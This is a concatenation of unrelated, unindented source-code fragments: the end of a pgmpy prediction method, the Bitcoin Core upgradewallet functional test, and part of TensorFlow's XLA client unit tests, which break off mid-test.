1, 1, 1, 0, 0, 0, 1, 0])
"""
from pgmpy.inference import VariableElimination
if set(data.columns) == set(self.nodes()):
raise ValueError("No variable missing in data. Nothing to predict")
elif set(data.columns) - set(self.nodes()):
raise ValueError("data has variables which are not in the model")
missing_variables = set(self.nodes()) - set(data.columns)
pred_values = defaultdict(list)
model_inference = VariableElimination(self)
for index, data_point in data.iterrows():
states_dict = model_inference.map_query(variables=missing_variables, evidence=data_point.to_dict())
for k, v in states_dict.items():
pred_values[k].append(v)
return pd.DataFrame(pred_values, index=data.index)
def get_factorized_product(self, latex=False):
# TODO: refer to IMap class for explanation why this is not implemented.
pass
def is_iequivalent(self, model):
pass
def is_imap(self, independence):
pass
|
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""upgradewallet RPC functional test
Test upgradewallet RPC. Download node binaries:
Requires previous releases binaries, see test/README.md.
Only v0.15.2 and v0.16.3 are required by this test.
"""
import os
import shutil
import struct
from io import BytesIO
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.bdb import dump_bdb_kv
from test_framework.messages import deser_compact_size, deser_string
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_is_hex_string,
sha256sum_file,
)
UPGRADED_KEYMETA_VERSION = 12
def deser_keymeta(f):
ver, create_time = struct.unpack('<Iq', f.read(12))
kp_str = deser_string(f)
seed_id = f.read(20)
fpr = f.read(4)
path_len = 0
path = []
has_key_orig = False
if ver == UPGRADED_KEYMETA_VERSION:
path_len = deser_compact_size(f)
for i in range(0, path_len):
path.append(struct.unpack('<I', f.read(4))[0])
has_key_orig = bool(f.read(1))
return ver, create_time, kp_str, seed_id, fpr, path_len, path, has_key_orig
class UpgradeWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-addresstype=bech32", "-keypool=2"], # current wallet version
["-usehd=1", "-keypool=2"], # v0.16.3 wallet
["-usehd=0", "-keypool=2"] # v0.15.2 wallet
]
self.wallet_names = [self.default_wallet_name, None, None]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
self.skip_if_no_bdb()
self.skip_if_no_previous_releases()
def setup_network(self):
self.setup_nodes()
def setup_nodes(self):
self.add_nodes(self.num_nodes, extra_args=self.extra_args, versions=[
None,
160300,
150200,
])
self.start_nodes()
self.import_deterministic_coinbase_privkeys()
def dumb_sync_blocks(self):
"""
Little helper to sync older wallets.
Notice that v0.15.2's regtest is hardforked, so there is
no sync for it.
v0.15.2 is only being used to test for version upgrade
and master hash key presence.
v0.16.3 is being used to test for version upgrade and balances.
Further info: https://github.com/bitcoin/bitcoin/pull/18774#discussion_r416967844
"""
node_from = self.nodes[0]
v16_3_node = self.nodes[1]
to_height = node_from.getblockcount()
height = self.nodes[1].getblockcount()
for i in range(height, to_height+1):
b = node_from.getblock(blockhash=node_from.getblockhash(i), verbose=0)
v16_3_node.submitblock(b)
assert_equal(v16_3_node.getblockcount(), to_height)
def test_upgradewallet(self, wallet, previous_version, requested_version=None, expected_version=None):
unchanged = expected_version == previous_version
new_version = previous_version if unchanged else expected_version if expected_version else requested_version
old_wallet_info = wallet.getwalletinfo()
assert_equal(old_wallet_info["walletversion"], previous_version)
assert_equal(wallet.upgradewallet(requested_version),
{
"wallet_name": old_wallet_info["walletname"],
"previous_version": previous_version,
"current_version": new_version,
"result": "Already at latest version. Wallet version unchanged." if unchanged else "Wallet upgraded successfully from version {} to version {}.".format(previous_version, new_version),
}
)
assert_equal(wallet.getwalletinfo()["walletversion"], new_version)
def test_upgradewallet_error(self, wallet, previous_version, requested_version, msg):
assert_equal(wallet.getwalletinfo()["walletversion"], previous_version)
assert_equal(wallet.upgradewallet(requested_version),
{
"wallet_name": "",
"previous_version": previous_version,
"current_version": previous_version,
"error": msg,
}
)
assert_equal(wallet.getwalletinfo()["walletversion"], previous_version)
def run_test(self):
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
self.dumb_sync_blocks()
# # Sanity check the test framework:
res = self.nodes[0].getblockchaininfo()
assert_equal(res['blocks'], COINBASE_MATURITY + 1)
node_master = self.nodes[0]
v16_3_node = self.nodes[1]
v15_2_node = self.nodes[2]
# Send coins to old wallets for later conversion checks.
v16_3_wallet = v16_3_node.get_wallet_rpc('wallet.dat')
v16_3_address = v16_3_wallet.getnewaddress()
node_master.generatetoaddress(COINBASE_MATURITY + 1, v16_3_address)
self.dumb_sync_blocks()
v16_3_balance = v16_3_wallet.getbalance()
self.log.info("Test upgradewallet RPC...")
# Prepare for copying of the older wallet
node_master_wallet_dir = os.path.join(node_master.datadir, "regtest/wallets", self.default_wallet_name)
node_master_wallet = os.path.join(node_master_wallet_dir, self.default_wallet_name, self.wallet_data_filename)
v16_3_wallet = os.path.join(v16_3_node.datadir, "regtest/wallets/wallet.dat")
v15_2_wallet = os.path.join(v15_2_node.datadir, "regtest/wallet.dat")
split_hd_wallet = os.path.join(v15_2_node.datadir, "regtest/splithd")
self.stop_nodes()
# Make split hd wallet
self.start_node(2, ['-usehd=1', '-keypool=2', '-wallet=splithd'])
self.stop_node(2)
def copy_v16():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.16.3 wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
v16_3_wallet,
node_master_wallet_dir
)
node_master.loadwallet(self.default_wallet_name)
def copy_non_hd():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.15.2 non hd wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
v15_2_wallet,
node_master_wallet_dir
)
node_master.loadwallet(self.default_wallet_name)
def copy_split_hd():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.15.2 split hd wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
split_hd_wallet,
os.path.join(node_master_wallet_dir, 'wallet.dat')
)
node_master.loadwallet(self.default_wallet_name)
self.restart_node(0)
copy_v16()
wallet = node_master.get_wallet_rpc(self.default_wallet_name)
self.log.info("Test upgradewallet without a version argument")
self.test_upgradewallet(wallet, previous_version=159900, expected_version=169900)
# wallet should still contain the same balance
assert_equal(wallet.getbalance(), v16_3_balance)
copy_non_hd()
wallet = node_master.get_wallet_rpc(self.default_wallet_name)
# should have no master key hash before conversion
assert_equal('hdseedid' in wallet.getwalletinfo(), False)
self.log.info("Test upgradewallet with explicit version number")
self.test_upgradewallet(wallet, previous_version=60000, requested_version=169900)
# after conversion master key hash should be present
assert_is_hex_string(wallet.getwalletinfo()['hdseedid'])
self.log.info("Intermediary versions don't effect anything")
copy_non_hd()
# Wallet starts with 60000
assert_equal(60000, wallet.getwalletinfo()['walletversion'])
wallet.unloadwallet()
before_checksum = sha256sum_file(node_master_wallet)
node_master.loadwallet('')
# Test an "upgrade" from 60000 to 129999 has no effect, as the next version is 130000
self.test_upgradewallet(wallet, previous_version=60000, requested_version=129999, expected_version=60000)
wallet.unloadwallet()
assert_equal(before_checksum, sha256sum_file(node_master_wallet))
node_master.loadwallet('')
self.log.info('Wallets cannot be downgraded')
copy_non_hd()
self.test_upgradewallet_error(wallet, previous_version=60000, requested_version=40000,
msg="Cannot downgrade wallet from version 60000 to version 40000. Wallet version unchanged.")
wallet.unloadwallet()
assert_equal(before_checksum, sha256sum_file(node_master_wallet))
node_master.loadwallet('')
self.log.info('Can upgrade to HD')
# Inspect the old wallet and make sure there is no hdchain
orig_kvs = dump_bdb_kv(node_master_wallet)
assert b'\x07hdchain' not in orig_kvs
# Upgrade to HD, no split
self.test_upgradewallet(wallet, previous_version=60000, requested_version=130000)
# Check that there is now a hd chain and it is version 1, no internal chain counter
new_kvs = dump_bdb_kv(node_master_wallet)
assert b'\x07hdchain' in new_kvs
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(28, len(hd_chain))
hd_chain_version, external_counter, seed_id = struct.unpack('<iI20s', hd_chain)
assert_equal(1, hd_chain_version)
seed_id = bytearray(seed_id)
seed_id.reverse()
old_kvs = new_kvs
# First 2 keys should still be non-HD
for i in range(0, 2):
info = wallet.getaddressinfo(wallet.getnewaddress())
assert 'hdkeypath' not in info
assert 'hdseedid' not in info
# Next key should be HD
info = wallet.getaddressinfo(wallet.getnewaddress())
assert_equal(seed_id.hex(), info['hdseedid'])
assert_equal('m/0\'/0\'/0\'', info['hdkeypath'])
prev_seed_id = info['hdseedid']
# Change key should be the same keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/1\'', info['hdkeypath'])
self.log.info('Cannot upgrade to HD Split, needs Pre Split Keypool')
for version in [139900, 159900, 169899]:
self.test_upgradewallet_error(wallet, previous_version=130000, requested_version=version,
msg="Cannot upgrade a non HD split wallet from version {} to version {} without upgrading to "
"support pre-split keypool. Please use version 169900 or no version specified.".format(130000, version))
self.log.info('Upgrade HD to HD chain split')
self.test_upgradewallet(wallet, previous_version=130000, requested_version=169900)
# Check that the hdchain updated correctly
new_kvs = dump_bdb_kv(node_master_wallet)
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(32, len(hd_chain))
hd_chain_version, external_counter, seed_id, internal_counter = struct.unpack('<iI20sI', hd_chain)
assert_equal(2, hd_chain_version)
assert_equal(0, internal_counter)
seed_id = bytearray(seed_id)
seed_id.reverse()
assert_equal(seed_id.hex(), prev_seed_id)
# Next change address is the same keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/2\'', info['hdkeypath'])
# Next change address is the new keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/1\'/0\'', info['hdkeypath'])
# External addresses use the same keypool
info = wallet.getaddressinfo(wallet.getnewaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/3\'', info['hdkeypath'])
self.log.info('Upgrade non-HD to HD chain split')
copy_non_hd()
self.test_upgradewallet(wallet, previous_version=60000, requested_version=169900)
# Check that the hdchain updated correctly
new_kvs = dump_bdb_kv(node_master_wallet)
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(32, len(hd_chain))
hd_chain_version, external_counter, seed_id, internal_counter = struct.unpack('<iI20sI', hd_chain)
assert_equal(2, hd_chain_version)
assert_equal(2, internal_counter)
# Drain the keypool by fetching one external key and one change key. Should still be the same keypool
info = wallet.getaddressinfo(wallet.getnewaddress())
assert 'hdseedid' not in info
assert 'hdkeypath' not in info
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert 'hdseedid' not in info
assert 'hdkeypath' not in info
# The next addresses are HD and should be on different HD chains
info = wallet.getaddressinfo(wallet.getnewaddress())
ext_id = info['hdseedid']
assert_equal('m/0\'/0\'/0\'', info['hdkeypath'])
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(ext_id, info['hdseedid'])
assert_equal('m/0\'/1\'/0\'', info['hdkeypath'])
self.log.info('KeyMetadata should upgrade when loading into master')
copy_v16()
old_kvs = dump_bdb_kv(v16_3_wallet)
new_kvs = dump_bdb_kv(node_master_wallet)
for k, old_v in old_kvs.items():
if k.startswith(b'\x07keymeta'):
new_ver, new_create_time, new_kp_str, new_seed_id, new_fpr, new_path_len, new_path, new_has_key_orig = deser_keymeta(BytesIO(new_kvs[k]))
old_ver, old_create_time, old_kp_str, old_seed_id, old_fpr, old_path_len, old_path, old_has_key_orig = deser_keymeta(BytesIO(old_v))
assert_equal(10, old_ver)
if old_kp_str == b"": # imported things that don't have keymeta (i.e. imported coinbase privkeys) won't be upgraded
assert_equal(new_kvs[k], old_v)
continue
assert_equal(12, new_ver)
assert_equal(new_create_time, old_create_time)
assert_equal(new_kp_str, old_kp_str)
assert_equal(new_seed_id, old_seed_id)
assert_equal(0, old_path_len)
assert_equal(new_path_len, len(new_path))
assert_equal([], old_path)
assert_equal(False, old_has_key_orig)
assert_equal(True, new_has_key_orig)
# Check that the path is right
built_path = []
for s in new_kp_str.decode().split('/')[1:]:
h = 0
if s[-1] == '\'':
s = s[:-1]
h = 0x80000000
p = int(s) | h
built_path.append(p)
assert_equal(new_path, built_path)
self.log.info('Upgrading to NO_DEFAULT_KEY should not remove the defaultkey')
copy_split_hd()
# Check the wallet has a default key initially
old_kvs = dump_bdb_kv(node_master_wallet)
defaultkey = old_kvs[b'\x0adefaultkey']
self.log.info("Upgrade the wallet. Should still have the same default key.")
self.test_upgradewallet(wallet, previous_version=139900, requested_version=159900)
new_kvs = dump_bdb_kv(node_master_wallet)
up_defaultkey = new_kvs[b'\x0adefaultkey']
assert_equal(defaultkey, up_defaultkey)
# 0.16.3 doesn't have a default key
v16_3_kvs = dump_bdb_kv(v16_3_wallet)
assert b'\x0adefaultkey' not in v16_3_kvs
if self.is_sqlite_compiled():
self.log.info("Checking that descriptor wallets do nothing, successfully")
self.nodes[0].createwallet(wallet_name="desc_upgrade", descriptors=True)
desc_wallet = self.nodes[0].get_wallet_rpc("desc_upgrade")
self.test_upgradewallet(desc_wallet, previous_version=169900, expected_version=169900)
if __name__ == '__main__':
UpgradeWalletTest().main()
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
